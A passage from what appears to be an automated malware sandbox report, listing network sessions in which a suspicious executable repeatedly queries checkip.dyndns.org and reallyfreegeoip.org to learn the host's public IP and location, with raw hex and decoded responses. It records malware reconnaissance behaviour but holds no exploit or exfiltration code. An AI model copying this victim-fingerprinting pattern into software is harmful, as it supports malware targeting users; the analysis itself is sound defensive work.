                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.549713193.122.130.0804304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          Oct 23, 2024 16:01:37.832098007 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:38.509852886 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:38 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 60bbe985eb7b6b6d05caab68ad43fc0b
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.549716193.122.130.0804304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          Oct 23, 2024 16:01:39.309393883 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:39.985116005 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:39 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d860c37a26ff99b89f0e41d79573aa4a
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.549718193.122.130.0804304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          Oct 23, 2024 16:01:41.003918886 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:41.658071041 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:41 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 4a26cb2c3702aac8c8ebe9850a7b5ac8
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.549720193.122.130.0804304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          Oct 23, 2024 16:01:42.424170971 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:43.090066910 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:43 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: eeddddf6f76342e6f872cd82b2032d4e
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.549722193.122.130.0804304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          Oct 23, 2024 16:01:43.869554043 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:44.558108091 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:44 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: dcfd078eff42214ae6584f2894c93855
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549707188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 14:01:35 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:35 UTC900INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:35 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28031
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=En%2Fe7bdFia2PHATeykmmLsfUo7sJ7c8gxX9EeGGD1ZfPKJx%2F75DZd%2BWXDpV8VfUzSsf6O3%2FivEG9YHlAT%2FmjG4f74iptTnFzjV%2B0IygSMLxDoq0wFh36YWr3vz8VnO3kgOtXn378"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d72428b496045e4-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2576512&cwnd=250&unsent_bytes=0&cid=7666d180dd736552&ts=249&x=0"
                          2024-10-23 14:01:35 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:35 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.549709188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 14:01:36 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-10-23 14:01:36 UTC900INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:36 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28032
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4JeRyb5Ykm5K%2FZJzNzs%2B3GPl5TLAU3ZEQBAJgKyqdcohAYTiXno3Qce6aBAIVXg2d4pkLKLa%2FamkubORKBnX8zTGTKDIjBgSTmjWIdSTZ%2BsV%2BHIYAYPAOqf%2B7QBY9bH4VBV70gc"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d724291cf820c46-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1210&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2282111&cwnd=251&unsent_bytes=0&cid=5bdbb202f845848b&ts=153&x=0"
                          2024-10-23 14:01:36 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:36 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.549712188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 14:01:37 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:37 UTC898INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:37 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28033
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZCiMyHJ%2FINgNq%2F7R7ubLoQQaKJ3sS%2Bx3gLyZf7sML%2BWy9pCV5idiShRHoIA2yUXogun2Eyqk9kovJRO%2F5QJ5tvPK17Qo4HDra35TSBX2XAq3IqHVVKart9ygwgqMDcqNDxey6ir"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d72429adcd4e8f5-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1745629&cwnd=251&unsent_bytes=0&cid=df807287f36d2861&ts=156&x=0"
                          2024-10-23 14:01:37 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:37 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.549715188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 14:01:39 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:39 UTC898INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:39 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28035
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B60gdqrpyQKpEbNq6%2FZUV2zRLA0x10%2FK54OXXhG0AVsopjoclekqpYx8AkQx4Nu3JtrSeBhqafA5zLC6j%2FRSyZNVyaqqYRffptIG5sZzgIWR8Q1g%2Bgfj6FWP4vjkVBaQb1n%2FTjWR"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242a42c8fe7a6-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1551982&cwnd=251&unsent_bytes=0&cid=7f11ba9ef345180e&ts=158&x=0"
                          2024-10-23 14:01:39 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:39 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.549717188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 14:01:40 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:40 UTC900INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:40 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28036
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuZlH1GSG6G1E2TYOqA5al8AaT3afPPJUCJ%2BHeRNJHbUsk2TZqOluAg4XZ%2BxBxVXREs7Ag8qkbkFmIgh9zuz0ado%2FhTHk35QGMzsAgHtWnOubcEuPPxcB%2FttS%2BLeXM2%2BpxluMyKa"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242ad5d1c2e72-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1568&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1846938&cwnd=219&unsent_bytes=0&cid=88eae73ad715b114&ts=188&x=0"
                          2024-10-23 14:01:40 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:40 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.549719188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 14:01:42 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-10-23 14:01:42 UTC900INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:42 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28038
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ql%2BKDPiQPBKyvg1PUtJSWxx%2BXjyOIk4NvbS%2FP99PmQM7Kl7vchJmCxZW03xoDTs8cm0FOZ4VG1udgXFI88INoNdTXI4AtzC7Ppu%2BIHUl2%2FY12am%2FYxuM2hwR9XaC8AvWO3XiVnwl"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242b79c946c30-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2642335&cwnd=251&unsent_bytes=0&cid=6c59b8bea0b685ca&ts=154&x=0"
                          2024-10-23 14:01:42 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:42 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.549721188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 14:01:43 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:43 UTC898INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:43 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28039
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4xidrKAxXi%2FrmHBiczuU6Tq7qJS1jwmHgPvfWw7Feo6fD5hlDXjkUuYRWqvq1FV%2BCUNqZVmBD%2Be2CQJaUPuKNWAZfrrsNewWIUcxxsgkpiX44Y%2FaWiMMSvaFirviU3lPtkJK%2FXei"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242c0ac9c2c9a-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2230&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1287111&cwnd=250&unsent_bytes=0&cid=699a1deac909cdc0&ts=157&x=0"
                          2024-10-23 14:01:43 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:43 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.549723188.114.97.34434304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
